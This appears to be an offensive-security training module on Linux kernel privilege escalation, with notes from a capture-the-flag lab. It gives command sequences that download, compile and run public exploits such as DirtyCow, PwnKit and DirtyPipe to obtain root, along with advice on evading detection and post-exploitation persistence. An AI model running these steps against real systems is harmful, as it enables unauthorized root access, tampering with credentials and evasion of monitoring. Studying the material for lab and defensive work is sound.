Back to All Modules

Kernel Exploits (Linux)

#Overview

Kernel exploits target vulnerabilities in the Linux kernel itself to escalate from user to root. They are the "nuclear option" of Linux privesc: powerful but risky. Kernel exploits can crash the system, corrupt data, or leave forensic artifacts. Always exhaust userland escalation (sudo, SUID, capabilities, cron) before resorting to kernel exploits.

#Prerequisites

  • User-level shell access
  • Kernel version identification (uname -a)
  • Compilation environment: gcc on target OR pre-compiled static binary from attacker
  • Matching architecture (x86, x64, ARM)

#Detection & Enumeration

# Get kernel version and architecture
uname -a
# Linux intentions 5.15.0-58-generic #64-Ubuntu SMP ... x86_64 x86_64 x86_64 GNU/Linux

# Get detailed version
cat /proc/version
# Linux version 5.15.0-58-generic (buildd@lcy02-amd64-101) ...

# Distribution info (for exploit compatibility)
cat /etc/os-release
cat /etc/lsb-release
lsb_release -a

# Compiler availability
which gcc
gcc --version
BASH

#Automated Exploit Suggestion

# Linux Exploit Suggester (LES)
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh

# linux-exploit-suggester-2 (more comprehensive)
wget https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl
perl linux-exploit-suggester-2.pl -k $(uname -r)
BASH

#Exploitation / Execution

#Compilation Strategy

# Option 1: Compile on target (requires gcc)
gcc exploit.c -o exploit
./exploit

# Option 2: Static compile on attacker (recommended)
# On attacker machine with matching architecture:
gcc -static -o exploit exploit.c
# Transfer and run on target
chmod +x exploit
./exploit

# Option 3: Pre-compiled exploits from repositories
# Download statically compiled binary matching the kernel version
BASH

#Common Linux Kernel Exploits

DirtyCow (CVE-2016-5195) -- Kernel 2.6.22 through 4.8.3:

# Race condition in COW (Copy-on-Write) mechanism
# Allows writing to read-only memory mappings
# Affects many older kernels, very reliable
wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
gcc -pthread dirtyc0w.c -o dirtyc0w
./dirtyc0w /etc/passwd /tmp/passwd
# Overwrite /etc/passwd with a modified version containing a root user
BASH

PwnKit (CVE-2021-4034) -- polkit's pkexec:

# Affects all major Linux distributions with pkexec
# Does not require kernel recompilation -- exploits pkexec SUID binary
# Download PoC:
wget https://raw.githubusercontent.com/arthepsy/CVE-2021-4034/main/cve-2021-4034-poc.c
gcc cve-2021-4034-poc.c -o pwnkit
./pwnkit
# Spawns root shell
BASH

GameOver(lay) (CVE-2023-2640, CVE-2023-32629) -- OverlayFS:

# Ubuntu-specific kernel vulnerability in OverlayFS
# Affects Ubuntu kernels 5.19 and 6.2
unshare -Urm sh -c '...'  # exploit chain
BASH

OverlayFS (CVE-2015-1328) -- Older Ubuntu kernels:

# Classic overlayfs exploit
gcc ofs.c -o ofs
./ofs
BASH

CVE-2022-0847 (DirtyPipe) -- Kernel 5.8+:

# Allows overwriting read-only files
# Overwrite /etc/passwd with root entry
wget https://haxx.in/files/dirtypipez.c
gcc dirtypipez.c -o dirtypipez
./dirtypipez
BASH

#Real Example: Help (Easy)

uname -a
# Linux help 4.4.0-116-generic #140-Ubuntu SMP ...

# Google: "linux kernel 4.4.0-116 exploit"
# Found CVE-2017-16995 (eBPF verifier)

# Download and compile
wget https://www.exploit-db.com/download/45010 -O exploit.c
gcc exploit.c -o exploit
./exploit
# Root shell spawned directly
BASH

#Custom Kernel Module Loading

When you have module loading capability:

# Create a simple reverse root shell kernel module
# Requires kernel headers matching the running kernel
# This is extremely noisy and detectable
BASH

#Common Pitfalls

  • Kernel panic (system crash) -- the exploit may crash the system. Test on non-production first.
  • Wrong architecture -- x86 exploit on x64 system will fail or crash. Check uname -m.
  • glibc version mismatch -- dynamically linked exploits compiled against newer glibc fail on older systems. Static compile avoids this.
  • gcc not installed -- target may lack gcc. Compile statically on attacker machine.
  • Exploit patched -- the kernel may have backported security patches without changing the version string.
  • Data corruption -- kernel exploits that modify kernel memory can corrupt filesystems or process state.
  • SELinux/AppArmor -- mandatory access controls may prevent exploit execution even with kernel bug.

#OPSEC Considerations

  • Running kernel exploits is the noisiest privilege escalation method. Expect detection.
  • Kernel panics generate crash dumps, system logs, and often trigger pager alerts.
  • Compiling on the target leaves gcc invocation logs and object files.
  • Successful exploitation creates anomalous process trees and open file descriptors.
  • Many kernel exploits are signatured by AV/EDR products.
  • Static compilation off-target and memory-only execution reduces artifacts but does not eliminate detection.

#Post-Exploitation Value

Successful kernel exploitation provides immediate root access with full control. Can be used to: disable SELinux/AppArmor, load kernel rootkits, install persistent backdoors, extract all system credentials, pivot with full network access. However, the risk of system instability makes it a last resort.

#Cross-References

#Tool References

ToolLink
linux-exploit-suggesterhttps://github.com/mzet-/linux-exploit-suggester
linux-exploit-suggester-2https://github.com/jondonas/linux-exploit-suggester-2
Exploit-DBhttps://www.exploit-db.com/

#Source Machines

  • Help (Easy, Linux) - Kernel 4.4.0-116-generic exploited via CVE-2017-16995 (eBPF verifier)